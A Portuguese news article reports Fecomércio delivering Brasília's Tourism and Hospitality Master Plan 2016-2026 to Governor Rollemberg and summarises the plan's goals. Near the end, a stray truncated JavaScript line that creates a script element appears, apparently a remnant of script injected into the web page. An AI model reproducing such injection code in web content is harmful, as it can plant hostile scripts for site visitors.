Fecomércio entrega Plano Diretor do Turismo a Rollemberg

adelmir-e-rollemberg
Adelmir (C): “O plano visa instigar o Estado a cumprir com seus deveres e suas missões.” Foto: divulgação/Fecomércio

O presidente da Fecomércio, Adelmir Santana, entregou ao governador Rodrigo Rollemberg, nesta terça-feira (8), na sede da Federação, o Plano Diretor de Turismo e Hospitalidade 2016-2026. A iniciativa pretende, até 2026, fazer da cidade um dos principais polos de eventos, negócios e turismo cultural. Entre as diretrizes presentes no documento estão estratégias de promoção, captação de eventos, infraestrutura e valorização dos espaços culturais. 

“Não se faz turismo sem a casa arrumada e sem uma boa recepção. Precisamos preparar os nossos equipamentos públicos para que as ações sugeridas sejam executadas. Conforme nos foi solicitado, estamos entregando um plano de turismo para o governo”, ressaltou Adelmir. 

Em reunião do Conselho de Desenvolvimento do Turismo (Condetur), Rollemberg pediu à Fecomércio que elaborasse um documento com as discussões travadas na área. “O plano visa instigar o Estado a cumprir com seus deveres e suas missões. Estamos dando indicativos de uma série de políticas objetivando o desenvolvimento dessa importante área da econômica nacional”, explicou o presidente da Federação. 

Rollemberg disse que a iniciativa da Câmara de Turismo legitima parcerias e oferece a possibilidade de ações conjuntas entre o setor privado e o Estado. “Eu considero extremamente importante essa união proposta pela Fecomércio para que nós possamos ter um plano a ser seguido e que norteie o turismo local. Reconheço que os nossos equipamentos turísticos precisam ser melhorados. Com esse intuito recebo com muito orgulho esse documento que será de grande ajuda para o nosso governo”, disse.  Ainda segundo o governador, o turismo é uma das alternativas mais rápidas e mais baratas para garantir o desenvolvimento sustentável da população.

Indicativo de políticas

Além de fomentar o turismo de eventos e negócios, a publicação salienta a importância da revitalização dos espaços culturais de Brasília e da importância de serviços turísticos de lazer e aventura às margens do lago Paranoá.

O presidente da Câmara de Turismo e do Sindicato das Empresas de Promoção, Organização, Produção e Montagem de Feiras, Congressos e Eventos do Distrito Federal (Sindeventos-DF), Francisco Maia, afirmou que o objetivo é encontrar alternativas que solucionem gargalos do segmento e que tornem Brasília referência no turismo mundial. Ele lembrou que a Câmara de Turismo lançou recentemente o Concurso Marca Brasília, a fim de criar uma identidade visual para a capital da República. 

O Plano Diretor pede mais atenção à qualificação de profissionais, à atração de investimentos e ao incentivo ao uso de tecnologias ambientalmente sustentáveis. Outro ponto de destaque é negociar melhorias na infraestrutura turística, propiciando acessibilidade, mobilidade e conectividade aos brasilienses e aos visitantes.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário